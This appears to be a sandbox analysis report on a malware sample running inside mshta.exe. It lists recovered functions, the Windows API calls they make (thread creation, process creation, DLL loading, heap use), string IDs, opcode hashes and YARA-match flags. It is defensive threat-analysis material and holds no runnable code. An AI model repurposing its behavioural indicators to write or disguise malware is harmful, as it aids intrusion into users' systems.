                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 573 2f30b8f-2f30b99 574 2f30b9b-2f30ba3 573->574 575 2f30c1a 573->575 576 2f30c1e-2f30c37 574->576 577 2f30ba5-2f30bc7 574->577 575->576 579 2f30c57-2f30c5d 576->579 580 2f30c39-2f30c48 PostThreadMessageW 576->580 580->579 581 2f30c4a-2f30c54 580->581 581->579
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 7940e7917a46a24fa532bae1aba0d6da2248eebe6bfcc7216a5af4a0fdda3ecc
                                                                                                                                                                                                                                                • Instruction ID: dd025bba3f2862332315696c98a64846455a743ee3e233b52a16ee5050a46ee7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7940e7917a46a24fa532bae1aba0d6da2248eebe6bfcc7216a5af4a0fdda3ecc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4116B76A0511EEAD702CA89DCC29EDFB78EE01684B1442AFD654AB201E331495E8BD1
                                                                                                                                                                                                                                                Function 02F30BD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 2acb864a190293544cf62d6d2341566552c88dd9cad9562ec2bb6e7db0518fc9
                                                                                                                                                                                                                                                • Instruction ID: ff03d8550ed934d33e581569faa4c1b8dbc25b3fecae8b103fd3d6f5e7ac21e5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2acb864a190293544cf62d6d2341566552c88dd9cad9562ec2bb6e7db0518fc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201A171D0124CBAEB11A6E19C81DEF7B7CDF416D8F048065FB0467140DA685E0A8BB1
                                                                                                                                                                                                                                                Function 02F43830 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02F438FB
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                • Opcode ID: 6043eec3e79568d71c98481fda1f07dbfe0521675bc2381b6555415399fc6872
                                                                                                                                                                                                                                                • Instruction ID: 264eae11a51416d886501941bb71f5f0dfe9447149814a2e5c442bcda6561fb9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6043eec3e79568d71c98481fda1f07dbfe0521675bc2381b6555415399fc6872
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1316DB1A05705BBDB14DF64CC81FEBBBB9EB88744F104558EA19AB241D7B0A640CFA4
                                                                                                                                                                                                                                                Function 02F3F2AA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                • Opcode ID: 3a8940f2947f886320102d079c7ffa327fa9e8f603877d6ec8d9ff160b13081f
                                                                                                                                                                                                                                                • Instruction ID: 09dcbac10bf5b1b060d99f9b99ba0f093bee20c428cc51bc32f9e3b2a2fbf8b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a8940f2947f886320102d079c7ffa327fa9e8f603877d6ec8d9ff160b13081f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18311EB5E1060AAFDB00DFD8CC809EEB7B9FF88304B108559E615EB254D775EE058BA0
                                                                                                                                                                                                                                                Function 02F3F2B0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                • Opcode ID: 1c44e8f710874a4320fc2317d50c943daeaa73e469648dabe1f0a8c170fed95c
                                                                                                                                                                                                                                                • Instruction ID: edd70794c2fbab3b5f76743b0fce09b2eb0e42ebc41067ba88e41a0b15a69089
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c44e8f710874a4320fc2317d50c943daeaa73e469648dabe1f0a8c170fed95c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98312DB5E1060AAFDB00DFD8CC809EFB7B9FF88304B108559E605AB214D775EE058BA0
                                                                                                                                                                                                                                                Function 02F34310 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F34382
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 282508fb21bd17aca9df835b009d57495aa02ac7e438b1e4d569ef3af68b8a63
                                                                                                                                                                                                                                                • Instruction ID: 3ac7562fb62f68659713d1f8215d4a1b68b928f89870eaa0344c2af2fec65c27
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 282508fb21bd17aca9df835b009d57495aa02ac7e438b1e4d569ef3af68b8a63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6015EB5D4020DABDB10EAE0EC41FADB7799B44348F004195AA0897241FA71E7088B91
                                                                                                                                                                                                                                                Function 02F49520 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,1C8A0D8E,?,02F380E4,00000010,?,?,?,00000044,?,00000010,02F380E4,?,1C8A0D8E,?), ref: 02F49580
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                                • Opcode ID: 892c4b32949344e5732f48a9e89ebf2cbd9803498b3ae1c0eb3c73e3f0126254
                                                                                                                                                                                                                                                • Instruction ID: 86434829a8b5e343f29b2feb236b944ad66da13c032b381eb830b479287ac411
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 892c4b32949344e5732f48a9e89ebf2cbd9803498b3ae1c0eb3c73e3f0126254
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E401C0B2200108BBDB54DF89DC81EEB77ADEF8D754F508208BA0DE3241D630F8518BA4
                                                                                                                                                                                                                                                Function 02F29AB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F29AF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                • Opcode ID: 6e52889699af5ba4176dd2c66863356435f7b2a10acb4c678b53126e20f279d1
                                                                                                                                                                                                                                                • Instruction ID: 8cc942a2aba6d2c93078fa9aaf3586c77209dbb6567a456d3572805033a75921
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e52889699af5ba4176dd2c66863356435f7b2a10acb4c678b53126e20f279d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF0653378031436E22065999C42F97775CCB91BA1F140026F70CEB1C0D9D5B40146E5
                                                                                                                                                                                                                                                Function 02F29AAC Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F29AF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                • Opcode ID: 13ccbd17bf1400e3dbcd7db94557d327728bca195cb1b7be332022bc15e97c2a
                                                                                                                                                                                                                                                • Instruction ID: ee8e1c904b47218534742a2d74e540e7989c759f017c2906e13ae2ab125c52ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13ccbd17bf1400e3dbcd7db94557d327728bca195cb1b7be332022bc15e97c2a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4F0657364031437E23065998C42F97B69C8F56B90F140029F708AB1C0D9D5B80046E5
                                                                                                                                                                                                                                                Function 02F343D1 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ff78ebe1c76c40d6e10bd54e3277e41e9895149dfb7c3ed5b3ef81c562190305
                                                                                                                                                                                                                                                • Instruction ID: a78fe683d8570ec0d5b82043774ae8d41b403272add4bc19c24bbdb57374a230
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff78ebe1c76c40d6e10bd54e3277e41e9895149dfb7c3ed5b3ef81c562190305
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F05234E0408DAEDB12DBF0CC46F8AFB24EB82214F0043CCDA848B0A1D22088829B81
                                                                                                                                                                                                                                                Function 02F49490 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,184EB60F,00000007,00000000,00000004,00000000,02F33B8D,000000F4), ref: 02F494CC
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                • Opcode ID: d45dd4416ad7f3a90ec090a28f93a4118255ba9b713096ae3f43c4bfbed4663a
                                                                                                                                                                                                                                                • Instruction ID: 1dcd45d1cc96b77866f3cb52d7c2fccf87347d5f598e5306213586b21a37c232
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d45dd4416ad7f3a90ec090a28f93a4118255ba9b713096ae3f43c4bfbed4663a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE06D71200204BBD610EE58DC41FDB37ADEF89750F004009FA08A7241DA71B811CBF8
                                                                                                                                                                                                                                                Function 02F49440 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(02F31859,?,02F454DF,02F31859,02F453FF,02F454DF,?,02F31859,02F453FF,00001000,?,?,00000000), ref: 02F4947F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: c0c97e144f40e868a9476a0e994ce902a3f535a152f54a84e659e6420cbf2a46
                                                                                                                                                                                                                                                • Instruction ID: bb90216842b8be3442b8b851e6537b022d4901778f0a3068afda7e20f424e32e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0c97e144f40e868a9476a0e994ce902a3f535a152f54a84e659e6420cbf2a46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E06D71200254BBE610EF58DC41FDF37ADEF8A750F008409FA09A7241DA71B8118BB8
                                                                                                                                                                                                                                                Function 02F38120 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F3814A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: aea520eee731d4f09d99dfd1d838b534620d1540fc64c1835be7d807da80aabf
                                                                                                                                                                                                                                                • Instruction ID: e28969f7d5aea219761ca75d4c0f7237b7fa7c4f3a5f627324b7fb1641216526
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aea520eee731d4f09d99dfd1d838b534620d1540fc64c1835be7d807da80aabf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE086716402082BFB147AA89C45F7633584B497E8F184A60FA2CDB3D2D678F5454194
                                                                                                                                                                                                                                                Function 02F38160 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F3814A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: f92460df8747156424fb1f1fbe2321b44ceef438163dfd636f81d948043c6f0a
                                                                                                                                                                                                                                                • Instruction ID: 9a1eff1a061407912371b98c2627e3a2c3897b6288b1c84d7f777d3a3257292b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f92460df8747156424fb1f1fbe2321b44ceef438163dfd636f81d948043c6f0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9E07D305083480AF322393C7C4579637648B43AE8F184B90F96CCA2D6D32CDC1942D5
                                                                                                                                                                                                                                                Function 02F37F20 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02F31B40,02F47D3E,02F453FF,02F31B0D), ref: 02F37F51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                • Opcode ID: 132132bc3e01322fee3752af350a48cfb28b1109c02b89782ba47361125cf94c
                                                                                                                                                                                                                                                • Instruction ID: 947fa0afa269229e8a0bccfc50e308b14bab8dcc80e5cb549a267d7cbbff47e5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 132132bc3e01322fee3752af350a48cfb28b1109c02b89782ba47361125cf94c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD05EB16802093BF600B6E9DC02F26328D5B457E8F0940B8FB0CEB283D995F1044AAA
                                                                                                                                                                                                                                                Function 02F37F1C Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02F31B40,02F47D3E,02F453FF,02F31B0D), ref: 02F37F51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                • Opcode ID: cb7e933f92d0a477c4984317aa401782dc36a60275c499fa241d21e7b01f09b8
                                                                                                                                                                                                                                                • Instruction ID: 36bd1d5144656256be78b395f3332b942dbde7d26097db3a2a1791c2a8a376d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb7e933f92d0a477c4984317aa401782dc36a60275c499fa241d21e7b01f09b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19D05BB168020537F510F6E4DC06F1636595B457E8F0940F4FB0CFB283D955E5044696
                                                                                                                                                                                                                                                Function 03882C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                                                                                                                                                                                                                • Instruction ID: 61dfe3f28fecd920ad6520eec8f37140209b9062e50be3e4db5aae14dee03f3e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2B09B719015C5C9EE11F7A04A08717794567D1701F2DC4E2D303C645E4739C1D5E176

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 03B604DF Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0c8050680cc26d22f34f3cb9e6fcf8c726be9034f40742458d4808aa89fe0cec
                                                                                                                                                                                                                                                • Instruction ID: cc0da886423b0a2cec541b129810032315fccf9d4a852f062b0957ecc240b572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c8050680cc26d22f34f3cb9e6fcf8c726be9034f40742458d4808aa89fe0cec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C241E17451CB094FD368FF699081676B3E2FB45318F5006BDC89AC7253EA74E8428785
                                                                                                                                                                                                                                                Function 02F2E030 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1f6ab5dc6ecebba2ddd90b1a1c9b68323c5c7b58239879a9e1b1fef18a4b08b0
                                                                                                                                                                                                                                                • Instruction ID: 04b024a0456fde3e63d5ffbd9868cc221bf495f8aadd910223707b90ee4f8f71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f6ab5dc6ecebba2ddd90b1a1c9b68323c5c7b58239879a9e1b1fef18a4b08b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEC08027F0114453D9301C5C75801F8FFAD8347111F1121D7E90DD32169447D5960299
                                                                                                                                                                                                                                                Function 03B6DFBB Relevance: 57.7, Strings: 46, Instructions: 243COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                • Opcode ID: ef52e644be56252fe3042fd8a10f41306365792933a75fb25a1bafbe2cd336d0
